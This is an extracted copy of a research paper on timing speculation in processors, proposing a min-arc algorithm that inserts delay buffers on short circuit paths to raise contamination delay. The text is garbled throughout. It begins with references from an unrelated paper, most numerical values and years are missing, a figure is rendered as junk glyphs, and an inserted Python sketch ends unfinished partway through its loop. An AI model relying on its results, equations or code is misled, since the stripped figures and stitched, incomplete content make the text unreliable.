Merijn van Erp, Louis Vuurpijl, and Lambert Schomaker. . An overview and comparison of voting methods for pattern recognition. In Eighth International Workshop on Frontiers in Handwriting Recognition, pages – . IEEE.
Hans van Halteren, Walter Daelemans, and Jakub Zavrel. . Improving accuracy in word class tagging through the combination of machine learning systems. Computational Linguistics, ( ): – .
Wajdi Zaghouani. . Critical survey of the freely available Arabic corpora. In Workshop on Free/Open-Source Arabic Corpora and Corpora Processing Tools, pages – , Reykjavik, Iceland.
Tong Zhang, Fred Damerau, and David Johnson. . Text chunking based on a generalization of Winnow. The Journal of Machine Learning Research, : – .

Managing Contamination Delay to Improve Timing Speculation Architectures

Naga Durga Prasad Avirneni, Prem Kumar Ramesh, and Arun K. Somani
Department of Electrical and Computer Engineering, Iowa State University, Ames, IA, USA
Current affiliation: Qualcomm, San Diego, CA, USA
Current affiliation: Intel, Bengaluru, Karnataka, India

Submitted October  . Accepted July  . Published August  . Corresponding author: Naga Durga Prasad Avirneni, prasad.avirneni@gmail.com. Academic editor: Soha Hassoun. Additional information and declarations can be found on page  . DOI  . /peerj-cs. . Copyright Avirneni et al., distributed under Creative Commons CC-BY. Open access.

Abstract

Timing speculation (TS) is a widely known method for realizing better-than-worst-case systems. Aggressive clocking, realizable by TS, enables systems to operate beyond specified safe frequency limits to effectively exploit the data-dependent circuit delay. However, the range of aggressive clocking for performance enhancement under TS is restricted by short paths. In this paper, we show that increasing the lengths of the short paths of a circuit increases the effectiveness of TS, leading to performance improvement. We also propose an algorithm to efficiently add delay buffers to selected short paths while keeping down the area penalty. We present our algorithm results for the ISCAS suite and show that it is possible to increase the circuit contamination delay by up to  % without affecting the propagation delay. We also explore the possibility of increasing short path delays further by relaxing the constraint on propagation delay and analyze the performance impact.
Subjects: Algorithms and Analysis of Algorithms, Computer Architecture, Embedded Computing, Emerging Technologies
Keywords: timing speculation, timing errors, PVT variation, overclocking, delay insertion, timing constraints, reliable and aggressive systems, contamination delay

Introduction

Systems have traditionally been designed to function reliably for the worst-case timing delays under adverse operating conditions. Such worst-case scenarios occur rarely, allowing possible performance improvement by making common cases faster. Alternative to conventional methods, the concept of latching data speculatively is called timing speculation (TS) (Austin, ; Bezdek, ; Ernst et al., ; Greskamp et al., ; Greskamp & Torrellas, ; Avirneni & Somani, ; Subramanian et al., ). Dual-latch based TS is a widely accepted methodology for designing better-than-worst-case digital circuits. Timing speculation based aggressive systems are designed on the philosophy that it is profitable to operate beyond worst-case limits to achieve the best performance by not avoiding, but detecting and correcting, a modest number of timing errors. Aggressive design methodologies exploit the fact that timing-critical paths are rarely exercised in a design and typical execution happens much faster. Recent works have also shown that the performance loss due to over-provisioning based on worst-case design margins is upward of  % in terms of operating frequency and upward of  % in terms of power efficiency (Gupta et al., ). Timing speculation combined with timing error tolerance is a powerful technique to ( ) achieve energy efficiency by under-volting, as in Razor (Ernst et al., ), or ( ) achieve performance enhancement by overclocking, as in SPRIT E (Bezdek, ).

Dual-latch based TS requires additional clock resources for the replicated latches (or flip-flops), which are triggered by a phase-shifted version of the original register's clock. Despite the area and routing overheads, the benefits achieved by dual-latched TS remain immense (Ernst et al., ; Avirneni & Somani, ; Subramanian et al., ; Das et al., ; Ramesh, Subramanian & Somani, ; Avirneni & Somani, ; Avirneni, Ramesh & Somani, ). However, Subramanian et al. ( ) pointed out that the performance benefits realized through TS are limited by the short paths of the circuit, due to the tight timing constraints that need to be met for error recovery. This problem is compounded when circuits have a significantly lower contamination delay. The contamination delay is defined as the smallest time it takes a circuit to change any of its outputs when there is a change in the input. It has been shown that for a carry-look-ahead (CLA) adder, significant performance enhancement is achieved when its contamination delay is increased by adding buffers (Subramanian et al., ). Increasing the delay of all shorter paths in the circuit above a desired lower bound, while not affecting the critical path, is one of the steps performed during synthesis of sequential circuits to fix hold time violations.
However, increasing the contamination delay of a logic circuit significantly, sometimes as high as half the propagation delay, without affecting its propagation delay is not a trivial issue (Shenoy, Brayton & Sangiovanni-Vincentelli, ). At first glance, it might appear that adding delay by inserting buffers on the shortest paths will solve the problem. However, the delay of a circuit is strongly input-value dependent, and the structure of the circuit plays a role in deciding the value of an output in a particular cycle. Current synthesis tools support increasing the delay of short paths through their hold-violation fixing option. Our major goal in this paper is to extend the hold time of the replicated register present in the dual-latch TS framework. Traditional delay optimization approaches consider only part of the problem, viz., ensuring that the delay of each path is less than a fixed upper bound. The closest work we are aware of is presented in Chen & Muroga ( ), which uses a timing optimization algorithm, SYLON-DREAM level-reduction (SDLR), to speed up multi-level networks. The non-critical paths are processed by an area reduction procedure to reduce network area without increasing the maximum depth. SDLR uses the concept of permissible functions in both the level and area reduction processes.

Contribution

The existing techniques only attempt to confine the critical path delay under a design-specified threshold. For TS architectures, the delay optimization algorithms must also make sure that the short paths satisfy imposed threshold requirements, to increase the extent of performance enhancement. This is in addition to keeping the existing short path timing constraints free of any hold time violations. This aspect of our work makes it different from any of the existing works. As far as we know, this is the first work aimed at increasing the contamination delay of digital circuits up to a given threshold, beyond satisfying hold time violations. In this paper, we make three significant contributions.
using our new algorithm, we were able to increase the contamination delay to % of the circuit critical path length and also without affecting its propagation delay. we were further able to increase the contamination delay by relaxing the propagation delay constraint for a larger gain in performance. the remainder of this paper is organized as follows. ‘timing speculation framework’ provides an overview of dual-latch ts framework. ‘performance impact of short paths’ investigates the timing constraints of ts framework and ‘increasing short path delays’ presents the challenges of increasing short path delays. in ‘performance & contamination delay: a study on alpha processor’, we present our case study on alpha processor. following this, we present the network model and the algorithm for manipulating short paths of the circuit in ‘min-arc algorithm for increasing short path delays.’ results of our experiments are presented in ‘evaluation of min-arc method.’ we present a brief literature review in ‘related literature’ and summarize our concluding remarks and future directions in ‘conclusions.’ timing speculation framework in a pipelined architecture, a timing error occurs if changes in the input propagate through the combinational logic before the computed results for the previous input are latched. the timing errors also occur due to the mismatch between the circuit propagation delay and the clock cycle time. therefore, in a pipelined processor, the clock frequency is determined based on the circuit critical path across all stages under the most adverse operating conditions. traditional design methodologies for the worst-case operating conditions are too conservative, as the critical timing delays rarely occur in tandem during typical circuit operation. such infrequent occurrence of critical timing delays opens up a new domain of study that allows improvement of processor performance to a greater extent. during avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) typical pipeline stage in a reliably overclocked processor (b) illustration of aggressive main and ps clocks for circuits with different contamination delays. execution, delay incurred by the digital circuit is much less than the worst-case delay. this can be exploited by making common cases faster. timing speculation is a technique wherein data generated at aggressive speeds are latched and sent forward speculatively assuming error free operation. error detection is deployed to detect a timing violation. when an error is detected, the forwarded data is voided and the computation is performed again as part of the recovery action. a framework to achieve this is described below. dual latched system we first present a brief description of a dual latched timing speculation framework from bezdek ( ). we refer to this framework as local fault detection and recovery (lfdr). figure a presents the lfdr circuit in between two pipeline stages. to reliably overclock a system dynamically using lfdr framework, we need two clocks: mainclk and psclk . the two clocks relationship is governed by timing requirements that are to be met at all times. lfdr consists of two registers: a main register clocked ambitiously by mainclk , which is running at a frequency higher than that is required for error-free operation; and a backup register clocked by psclk , which has same frequency as mainclk but is phase shifted. 
This amount of phase shift is such that the backup register always samples the data while meeting the worst-case propagation delay of the combinational circuit. The timing diagram shown in Fig. B illustrates the phase relationship between these clocks. Here, case (i) presents the worst-case clock, WCCLK, whose time period covers the maximum propagation delay. Case (ii) shows a TS scenario, where the clock time period is reduced; however, PSCLK is delayed in such a way that the next rising edge of PSCLK coincides with the next rising edge of WCCLK. Thus a computation started at the rising edge of MAINCLK will successfully complete by the next rising edge of PSCLK. The key point to note here is that the amount of phase shift for PSCLK is limited by the contamination delay, TCD, of the circuit.

Figure  shows timing waveforms that depict timing speculation using LFDR. In the figure, one instruction moves forward without any timing errors using speculation. However, another instruction encounters a timing error in stage i, indicated by the corrupted data "TERR." This error is detected by the error detection mechanism, and the stage error signal is asserted. This stage error signal triggers a local and global recovery. Timing error recovery flushes the data sent forward speculatively, indicated in the figure as "XXX," and voids the computation performed by stage i+ . Once the timing error is fixed, the pipeline execution continues normally. It is clear from the waveform that time is gained through TS. A balance must be maintained between the number of cycles lost to error recovery and the gains of overclocking. One important factor that needs to be addressed while phase shifting PSCLK is to limit the amount of phase shift to within the fastest delay path of the circuit.

Figure : Timing diagram showing pipeline-stage-level timing speculation.

Performance Impact of Short Paths

The cardinal factor that limits data-dependent allowable frequency scaling for LFDR frameworks is the contamination delay of the circuit. The phase shift of the delayed clock is restricted by the contamination delay to prevent an incorrect result from being latched in the backup register. Reliable execution can be guaranteed only if the contents of the redundant register are considered "golden." To overcome this limitation, it is important to increase the contamination delay of the circuit. Case (iii) in Fig. B presents a TS scenario where the clock time period is reduced and PSCLK is delayed by a larger amount; as the phase shift is greater, the range of achievable overclocking is higher in case (iii) than in case (ii). From this example, we can conclude that having a contamination delay T′CD > TCD increases the range of aggressive clocking under TS.

Let us denote the worst-case propagation delay and minimum contamination delay of the circuit as TPD and TCD, respectively. Let TWCCLK, TMAINCLK, and TPSCLK represent the clock periods of WCCLK, MAINCLK, and PSCLK, respectively. Let TPS represent the amount of phase shift between MAINCLK and PSCLK, and let TOV denote the overclocked time period.
the maximum possible frequency, fmax permitted by reliable overclocking is governed by tcd. this is because short paths in the circuit, whose delay determine tcd, can corrupt the data latched in the backup register. if the phase shift tps is greater than tcd, then the data launched can corrupt the backup register at psclk edge. if such a corruption happens, then the backup register may latch incorrect result and cannot be considered ‘‘golden.’’ hence, it is not possible to overclock further than fmax . the following equations should hold at all times to guarantee reliable overclocking. tps≤tcd ( ) fmax ≤ tpd−tcd · ( ) for any intermediate overclocked frequency, fint , between fmin and fmax , tps ≤tcd. during operation, fint is determined dynamically based on the number of timing errors being observed during a specific duration of time. the dependence of phase shift on contamination delay leads directly to the limitation of the aggressive frequency scaling. a simplistic notion of the maximum speed-up that is achievable through reliable overclocking is given by eq. ( ). maximum speedup= tpd tpd−tcd · ( ) increasing short path delays it is clear from eq. ( ) that the maximum speedup is achieved when the difference between the contamination delay and propagation delay is minimal. however, it must be noted that increasing tcd also affects the margin for overclocking. to overcome this challenge, we develop a technique for increasing the contamination delay to a moderate extent without affecting the propagation delay of the circuit. as outputs of the combinational logic depends on several inputs, and more than one path to each output exists, with both shorter and longer paths overlapping, adding buffer delays to shorter paths may increase the overall propagation delay of the circuit. the main challenge is to carefully study the delay patterns, and distribute the delay buffers across the interconnections. more importantly, the overall propagation delay must remain unchanged. however, it may not be possible to constrain propagation delay of the critical paths due to logic/interconnection sharing in the network. most practical circuits have significantly lower contamination delay. for instance, we verified that an -bit cla adder circuit, implemented in . µm cadence generic avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. standard cell library (gsclib), has a propagation delay of . ns, but an insignificant contamination delay of . ns, thus allowing almost no performance improvement through reliable overclocking. it should be noted that the outputs of cla adder depends on more than one inputs, thus a trivial addition of delay buffers to short paths results in increased propagation delay of the circuit. however, by re-distributing the delay buffers all to one side (either input or output), it is possible to increase contamination delay, without affecting the propagation delay, by up to . ns. increasing circuit path delay above a desired level without affecting critical path is not uncommon in sequential circuit synthesis. in fact, it is performed as a mandatory step during synthesis operation. in a sequential circuit, for an input signal to be latched correctly by an active clock edge, it must become stable before a specified time. this duration before the clock edge is called the set up time of the latch. the input signal must remain stable for a specified time interval after the active clock edge in order to get sampled correctly. 
this interval is called the hold time of the latch. any signal change in the input before the next set-up time or after the current hold time does not affect the output until the next active clock edge. clock skew, which is the difference in arrival times at the source and destination flip-flops, also exacerbates hold time requirements in sequential circuits. hold time violations occur when the previous data is not held long enough. hence, adding buffers to short paths that violate hold time criteria is a step that is carried out without too much of a concern regarding area and power overheads. increasing the contamination delay of a logic circuit significantly without affecting its propagation delay is not straightforward (shenoy, brayton & sangiovanni-vincentelli, ). at first glance, it might appear that adding delay by inserting buffers to the shortest paths will solve the problem. however, delay of a circuit is strongly input dependent, and several inputs play a role in deciding the value of an output in a particular cycle. current synthesis tools support increasing the delay of short paths through their hold violation fixing option; in a broader sense, what we essentially want to do is to extend the hold time of the backup register. though it is possible to phase shift to a maximal extent, reducing the clock period by that amount may result in higher number of errors. having a control over the increase in contamination delay gives us an advantage to tune the circuit’s frequency to the optimal value depending on the application and the frequency of occurrence of certain input combinations. also, introducing delay to increase contamination delay increases the area of the circuit. therefore, while judiciously increasing contamination delay we must also ensure that the increase in area is not exorbitant. performance & contamination delay: a study on alpha processor to demonstrate the effect of increasing short paths on performance, we conducted a simple study on alpha processor model for different contamination delay settings. we ran selected set of spec benchmark workloads on simplescalar—a cycle accurate simulator (burger & austin, ). in order to embed timing aspects in simplescalar, we examined avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table simulator parameters. parameter value fetch/decode/issue/commit width inst/cycle functional units int alus, int mul/div, fp alus, fp mul/div l d-cache k l i-cache k l unified k technology node nm base frequency . ghz no. of freq levels freq sampling µs freq penalty µs (assuming dual pll) a hardware model of alpha processor datapath and obtained the number of timing errors occurring at different clock period, for each workload. for this purpose we synthesized illinois verilog model (ivm) for alpha configuration using nm osu standard cell library (stine et al., ). although we are aware of the fact that the pipeline in ivm is simplistic, it does not have any impact on our results as we are performing a comparative study of different settings for the same circuit. in this experiment, we are exploring the impact of contamination delay on timing speculation framework at circuit level. therefore, we believe our analysis and insights are applicable to other architectures as well. we adopt the configuration close to hardware model for simplescalar simulations as well. 
the details of the settings are presented in table and more details about our hardware model can be found in ramesh, subramanian & somani ( ). it is important to note that, for our hardware model, the timing critical path is in the issue stage of the processor pipeline. therefore, applications which are core bound will be effected more than the applications that are memory bound. in this study, we have presented the benchmarks which has higher error rate than the rest of the suite for all equal intervals of the operating frequency. therefore, performance results from this study present the lower bounds of speed-up that can be observed for spec benchmarks. performance results for other benchmarks are bound to be higher than speed-up observed in our study. experimental results figure a shows the cumulative error rate of selected spec workloads for equal intervals, for worst-case delay of ns and minimum contamination delay of . ns. the error profile obtained is the average values obtained by running the experiment for , cycles, and repeating the experiment with different sequences of , instructions for each workload. benchmarks gap and bzip are core bound and therefore have a dominating timing error rate. benchmark equake is memory bound and its timing error rate is less than the core bound applications for the entire operating frequency range. a random timing error injector induces appropriate number of errors in simplescalar. pipeline stall of one cycle per error occurrence is added correspondingly. as increasing the contamination delay affects path distribution of the whole circuit, it is likely that the overall avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure (a) cumulative error rate at different clock periods for the ivm alpha processor executing instructions from spec benchmarks (b) average error rate per clock cycle (c) normalized speed-up relative to reliably overclocked original unmodified circuit. error rate for each workload may go up. in our experiment, we assume uniform increase in error rate, denoted as dev, for each workload. for our study, we used dev = , , and %. further, we analyze the performance impact of varying cds with different target error rates (tgt). figure b shows the error occurrence per cycle for bzip , equake and gap. quite evidently, we observed smaller error occurrences for small/no deviation of circuit, and the error rate tend to increase as the error rate due deviation, dev, goes up. however, a small increase in target error rate allows more margins for performance increase. but, this may not hold true for higher error rates. in general, it was generally observed that when dev gets closer to tgt, there was an increase in error occurrences. this is more noticeable in the case of gap. since it may not always be possible to increase the contamination delay without affecting the critical paths, we increase the cd to a threshold limit. as a result, we may end up increasing the pd. we also experimented with the possibility of increasing pd by allowing a leeway of a small percentage. we study the speed-up obtained for different combinations of cd threshold and pd leeway relative to the performance of aggressive clocking framework with the original circuit. l〈l〉−t〈t〉 denotes l% leeway of pd and t% minimum threshold of cd. we performed our study for l = , , and % and t = , , and %. we found that in all the cases, performance goes up with threshold values, which is in agreement with our intuition. 
in other words, increasing the short path delays provides more allowance for reliable aggressive clocking assuming a moderate target error rate occurrence. it should also be noted that allowing a leeway on critical paths induces performance overhead. normalized speed-up trend of bzip workload for various modes of operation is exemplified in fig. c. we have illustrated the results for the modes that yielded performance gains. the performance of bzip benchmark for all the configurations we implemented is shown in fig. . from the point of view of leeway on pd, our investigation on relative performance is summarized as follows: • l= is the best case scenario for performance benefits, yielding from – % speed-up. • ≤l≤ is the effective range for any performance benefit, irrespective of t . • l= % gives a small increase in performance in the range %≤dev ≤ %. • l= % gives a little increase in performance for few cases in the range %≤dev ≤ %. • l > % causes performance overhead even for higher values of t and smaller dev. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. �� ���� �� ���� � ��� �� ��� � �� �� � �� �� � �� ��� � �� � ��� � �� � �� � �� � �� � �� � ��� � � � ��� � � � �� � � � �� � � � ��� � � � ��� � � � �� � � � �� � � � ��� � � � �� � �� � � � � � � � � ����� ��������� �������� ��� ����� ��� ���� figure normalized speed-up of bzip benchmark for different l and t configurations. similar trends were observed for equake and gap as well. our experiments reveal that by increasing the delays of short paths up to %, subject to moderate increase in pd (typically %), yields up to % performance enhancement. also, it is very important to keep the increase in error rate due to circuit deviation within %. this guarantees zero overhead even at maximum leeway (l= %). this study establishes a case for change in the existing synthesis algorithms to incorporate minimum path delay constraints. the major change in this revised algorithm is to increase the short path delays without (or minimally) affecting the critical path delays of the circuit. a secondary and passive constraint is to maintain the circuit variation (if not make it better), so that the deviation causing increase in error occurrences is kept minimal. we will discuss more on this constraint later. we provide a systematic approach to realize circuits with path delay distribution that allows greater margin for aggressive clocking for performance enhancement. min-arc algorithm for increasing short path delays it is easy to understand that increasing short path delays invariably increases the area of the circuit and, if not done carefully, affects its propagation delay. an ideal solution is to have logic moved from the critical path to the non-critical paths without using the specified components at the output terminals. this is not always possible. the next best approach would be to increase the delay of short paths as much as possible without increasing the propagation delay, and keep the area increase within a limit. as mentioned earlier, short path delays can be increased without affecting propagation delay for carry look-ahead adders and other smaller circuits. however, this is done manually, and the area overhead is very high for -bit adders. minimizing short path constraints, without increasing propagation delay may not be possible for many practical circuits. 
in that case, we can allow a small increase in the propagation delay, if that increase can allow higher margin for ts. avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we introduce min-arc algorithm for increasing contamination delay of logic circuits up to a defined threshold. we adopt an approach closely resembling the min-cut algorithm for flow networks. the basic idea of the algorithm is to identify a set of edges, referred to as the cut-set, such that adding a fixed amount of delay to the set does not affect the delays of any long paths. however, an important difference between this and traditional flow networks is that the cut-set for the min-arc may not necessarily break the flow of the network. but rather, the cut-set is a subset of edges in the actual (rather traditional) min-cut. the reason why we do not consider a traditional min-cut is to not unnecessarily add delay buffers where it is not needed. however, a subset of the min-cut edges is essential to keep the addition of delays minimal. another reason for increasing the path delay in batches is to keep the structure of the logic network close to unaltered from the original network. benefits of maintaining path delay distribution is explained further in ‘evaluation of min-arc method.’ the basic outline of the min-arc algorithm to increase the short path delay of the circuit is presented in algorithm . the entire procedure is divided into six basic steps, in which the first and last steps are one-time operations, converting the logic circuit to an equivalent graph network and vice-versa. the remaining parts of the algorithm modify the graph into a weighted graph network and iteratively update the prepared network by adding the necessary delay to the selected interconnection using the modified min-cut procedure. we explain these steps in detail below. construction of weighted graph network the first step is to convert the given combinational logic into a directed graph, where the logic blocks are nodes and the interconnections from each logic block to others form directed edges. the nodes and edges may be weighted depending on their time delays. to this graph we add a source, s, and edges that connects s to all the inputs. we also add a drain node, d, to which all the outputs connect. the weights for s, d and all the edges from/to them are set to zero. figure illustrates an example network model for a -bit ripple carry adder with s and d added. tpd and tcd of the logic circuit are highlighted in the figure. it is necessary to preserve the node types whether they are logic gates, buffer delays, input or output pins. also it is important to note the type of logic for a logic gate node. this is important in order to maintain functional correctness of the circuit. algorithm . steps for manipulating short path delay in logic circuits step a: convert combinational circuit to a graph step b: get minimum and maximum path through every edge step c: prepare graph for min-cut step d: do min-cut on the graph obtained in step c step e: add delay to the edges returned by min-cut step f: update the graph and repeat steps b through f until contamination delay is increased up to the required value step g: convert the graph back to combinational logic circuit avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration: network model for -bit ripple carry adder, assuming unit interconnect and logic delays. 
finding the minimum and maximum path once the directed network is constructed, the next step is to mark the edge weights for generating the cut-set. we use several terms and symbols as described in table . we calculate the longest and shortest distances from source to one end node of an edge and from the other end of the edge to drain. that is, we obtain max(s,i), max(j,d) min(s,i) and min(j,d) for every edge e(i,j) in the weighted graph. we use djikstra’s algorithm to calculate max() and min() functions. from this, we calculate emax(i,j) and emin(i,j) for every edge, e(i,j) as described in table , which corresponds to the longest and shortest paths of the logic network through that edge. the paths marking emin(i,j) and emax(i,j) for randomly chosen nodes i and j for the -bit ripple carry example is depicted in fig. . in a similar manner, the minimum and maximum weights for every edge are calculated. preparing graph for min-cut we construct a weighted graph network to select a minimum weight interconnection to add the delay buffer. once we add a delay buffer, we recalculate new edge weights. the edge weights are calculated in such a manner that the minimum weighted arc gives the most favorable interconnection where to add delay. the procedure for calculating new weights for every edge, e(i,j), is described in algorithm . the edge, e(i,j) may fall under one of the four categories listed in the algorithm. for the first two cases, the edge weight is calculated as the sum of emin(i,j) and emax(i,j). this is the general scenario where the minimum and maximum paths are added as edge weights. the first case is the scenario of a short path, where emax(i,j) is smaller than the threshold for contamination delay. the latter case is when the selected edge, e(i,j), has a delay such that the shortest path is closer to the threshold than the longest path is to the propagation delay. in other words, when a delay buffer is added to any edge in the path to increase the short path delay by the given threshold, the maximum delay increase affecting a critical path is still within propagation delay of the circuit. the third scenario is when the longest path exceeds propagation delay including leeway. this edge is critical and by no means any buffer can be added to this. hence, we assume a large number (inf) as the edge weight so that this edge is never picked as part of the min-cut. finally, we have a case when delay buffer addition exceeds or gets avirneni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table definitions. terms definitions max(i,j) maximum delay path from node i to j, incl. i and j min(i,j) minimum delay path from node i to j, incl. i and j max(s,d) propagation delay of the circuit, tpd min(s,d) contamination delay of the circuit, tcd e(i,j) edge from node i to j wt(i,j) weight of edge from node i to j, not incl i and j emax(i,j) max(s,i)+wt(i,j)+max(j,d) emin(i,j) min(s,i)+wt(i,j)+min(j,d) lwy percentage of leeway [ - ] on critical path while adding buffer. e.g., lwy =x% allows the target network to have tpd( +x/ ) as the final propagation delay thd normalized threshold (from tcd to tpd) below which we do not want any short paths inf a very large integer value scale a moderate integer value, (>tpd), to scale the weight to a new range. func() a function dependent on tpd, tcd, emax(i,j) and emin(i,j). returns a real number, - . 
in this work, we define func() as

func() = sqrt((emax(i,j) − thd) / (tpd − thd)) × sqrt((emin(i,j) − tcd) / (thd − tcd)).

in this case, we scale the edge weight moderately higher than the original range. this addresses the case where the addition of a buffer to this edge affects longer paths.

algorithm . re-calculation of edge weight for edge e(i,j)
if emax(i,j) ≤ thd then
    wt(i,j) = emin(i,j) + emax(i,j)
else if (thd − emin(i,j)) < (tpd − emax(i,j)) then
    wt(i,j) = emin(i,j) + emax(i,j)
else if emax(i,j) > tpd(1 + lwy) then
    wt(i,j) = inf
else
    wt(i,j) = scale ∗ func()
end if

finding the min-cut
once the edge weights are re-assigned, the cut-set is determined. we use a variant of the edmonds–karp min-cut algorithm for graph networks (edmonds & karp, ). the cut-set consists of edges with minimum weight in the graph with assigned weights. figure illustrates the different scenarios in determining the cut-set. the cut-set re-definition is necessary because the traditional min-cut always has at least one edge in the critical path. figure a shows how a logic circuit is divided into critical and non-critical paths. as long as the non-critical paths are independent of critical paths, buffer delays can be added to the former ones. in this case, the min-cut excludes all the critical paths. generally, the scenario is not this straightforward. as illustrated in fig. b, the short paths are intertwined with longer paths that are not critical paths. in such cases, the weights of the longer paths are scaled to a different range (in this case k). if there is a subset of short paths that exist independent of the longer paths, buffer delays are added to this subset. we noticed that this is the most common scenario in the benchmark circuits. once all the independent short paths have been added with corresponding delays, the new circuit is left with paths that are scaled as shown in fig. c. buffer delay is added to the scaled paths, which runs the risk of modifying longer paths into critical paths. the final circuit is shown in fig. d, where there are only critical paths and paths that have delay meeting the threshold requirements. in the ripple carry example, the case is similar to fig. a. the cut-set is thus all the paths excluding the critical path. figure also shows the min-cut where the buffers are added.

figure illustration of four different scenarios finding the cut-set in the min-arc algorithm.

adding buffer delays
the buffers are carefully placed on edges where they would not affect the longest paths. thus, the amount of delay each buffer adds depends on the path connectivity, which may have a major impact on the timing error occurrence. for example, it is possible to add delays such that all the paths have delay equal to the critical path delay. in most practical circuits, increasing all path delays to a certain delay interval can result in a rise in the timing errors, causing overhead due to error recovery. thus, it is always necessary to keep this under control when designing the algorithm so that there is a gentle rise in path delays from one interval to the other. buffers are added on the edges present in the cut-set. the amount of delay added, delay(i,j), for any edge e(i,j) is given by

delay(i,j) = min((thd − emin(i,j)), (tpd − emax(i,j))).
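the per-edge bounds, the weight re-assignment and the added delay above can be transcribed directly. the sketch below is our own illustration and not the authors' code: instead of dijkstra, the distance helper relaxes nodes in topological order, which is valid because a combinational circuit is acyclic; the values chosen for inf and scale are assumptions.

```python
# illustrative sketch: emin/emax for every edge, the four-case edge weight,
# and the buffer delay amount from the equation above.
import math
import networkx as nx

INF = 10 ** 9      # "a very large integer value"
SCALE = 10 ** 4    # "a moderate integer value (> tpd)"; exact value assumed here

def dag_dist(g, source, longest=True):
    # longest/shortest distance from `source` to every node of an acyclic graph
    dist = {n: (float("-inf") if longest else float("inf")) for n in g}
    dist[source] = 0.0
    better = max if longest else min
    for u in nx.topological_sort(g):
        if abs(dist[u]) == float("inf"):
            continue  # unreachable from source
        for _, v, w in g.out_edges(u, data="weight"):
            dist[v] = better(dist[v], dist[u] + w)
    return dist

def edge_bounds(g):
    # emax(i,j) = max(s,i) + wt(i,j) + max(j,d); emin(i,j) is analogous
    rev = g.reverse(copy=True)
    s_max, s_min = dag_dist(g, "s", True), dag_dist(g, "s", False)
    d_max, d_min = dag_dist(rev, "d", True), dag_dist(rev, "d", False)
    emax = {(i, j): s_max[i] + w + d_max[j] for i, j, w in g.edges(data="weight")}
    emin = {(i, j): s_min[i] + w + d_min[j] for i, j, w in g.edges(data="weight")}
    return emin, emax

def func(emax_ij, emin_ij, tpd, tcd, thd):
    # func() as defined above
    a = max((emax_ij - thd) / (tpd - thd), 0.0)
    b = max((emin_ij - tcd) / (thd - tcd), 0.0)
    return math.sqrt(a) * math.sqrt(b)

def edge_weight(emax_ij, emin_ij, tpd, tcd, thd, lwy=0.0):
    # the four cases of the weight re-calculation (lwy given as a fraction)
    if emax_ij <= thd:
        return emin_ij + emax_ij
    if (thd - emin_ij) < (tpd - emax_ij):
        return emin_ij + emax_ij
    if emax_ij > tpd * (1 + lwy):
        return INF  # critical edge: never picked as part of the cut-set
    return SCALE * func(emax_ij, emin_ij, tpd, tcd, thd)

def added_delay(emax_ij, emin_ij, tpd, thd):
    # buffer delay placed on a cut-set edge, per the equation above
    return min(thd - emin_ij, tpd - emax_ij)
```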
the delays for all the edges in a cut-set, for a given iteration, are added at the same time. while adding delay, we ensure that in one iteration there are no other edges to which the delay is added that are connected to paths through this edge. please note that there is a relation between max-flow and min-cut problems and the proposed formulation is in fact max-flow.

satisfying conditions
we iterate steps b through f until the minimum condition for the shortest path is met or until there is no other edge where delay can be added without affecting tpd of the circuit (including lwy). step f checks if the desired value of contamination delay is reached. once the required conditions are met, no more buffers can be added and the algorithm moves on to step g. from our experiments, we found that the minimum condition for contamination delay is achieved for all the circuits we evaluated.

converting graph to logic circuit
the final step is to revert back to the original circuit once the short path lengths are increased to the desired level. since we record the node types in the network graphs in step a, it is possible to re-build the circuit from the graph network with the added buffers. it should be noted that we do not modify the logic of the circuit, as we only add additional buffers preserving the original logic of the circuit.

complexity of min-arc algorithm
the time complexity of the min-arc algorithm is mainly affected by steps b and d. let |v| be the total number of logic blocks (vertices) and |e| the total number of interconnections (edges) in the logic circuit. using dijkstra’s shortest path algorithm, the worst case time to calculate the max() and min() functions is o(|v|²). finding the minimum weighted edge min-cut for the graph network takes o(|v||e|²). in the worst case every edge becomes a part of the cut-set, that is, there are at most |e| iterations. hence, the overall time complexity of the min-arc algorithm is o(|v|²|e| + |v||e|³), which is dominated by the second term as |v| < |e|.

impact of process variation
process variation can alter gate delays and hence can alter the distribution of path delays. therefore, we need to take conservative estimates of circuit delays into account while using our algorithm. inter-die variations impact all the paths and therefore their impact on our algorithm is minimal. to mitigate intra-die variation, conservative padding of buffers needs to be done on the short paths to make sure that extreme variation is tolerated at the expense of area overhead. if such additional area overheads are to be ignored, process variation will only reduce the range of aggressive clocking slightly, and cannot eliminate the possibility of reliable overclocking and the scope for performance improvement by ts. given that the scope of this paper is to demonstrate the concept and develop an algorithm to realize it, we do not evaluate the actual impact any further.

table : brief description of iscas benchmarks with netlist details (columns: circuit, description, inputs, outputs, gates, nets, area (µm²)).

evaluation of min-arc method
although the time complexity of the min-arc algorithm is of polynomial order, it is necessary to consider its performance on practical circuits.
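before turning to the benchmark evaluation, the overall iteration (steps b through f) can be sketched as follows. this is a simplified, illustrative loop of our own that reuses the helpers sketched earlier; it omits the per-iteration independence checks described above and uses the standard edmonds–karp min-cut from networkx as a stand-in for the paper's modified cut-set selection.

```python
# illustrative, simplified top-level loop of the min-arc procedure
import networkx as nx
from networkx.algorithms.flow import edmonds_karp

def min_arc(g, tpd, tcd, thd, lwy=0.0, max_iters=1000):
    for _ in range(max_iters):
        emin, emax = edge_bounds(g)                       # step b
        if min(emin.values()) >= thd:                     # short paths long enough
            break
        for i, j in g.edges():                            # step c: assign weights
            g[i][j]["capacity"] = edge_weight(emax[(i, j)], emin[(i, j)],
                                              tpd, tcd, thd, lwy)
        _, (src_side, sink_side) = nx.minimum_cut(g, "s", "d",
                                                  flow_func=edmonds_karp)  # step d
        cut = [(i, j) for i, j in g.edges()
               if i in src_side and j in sink_side]
        if not cut:
            break
        for i, j in cut:                                  # step e: add buffer delay
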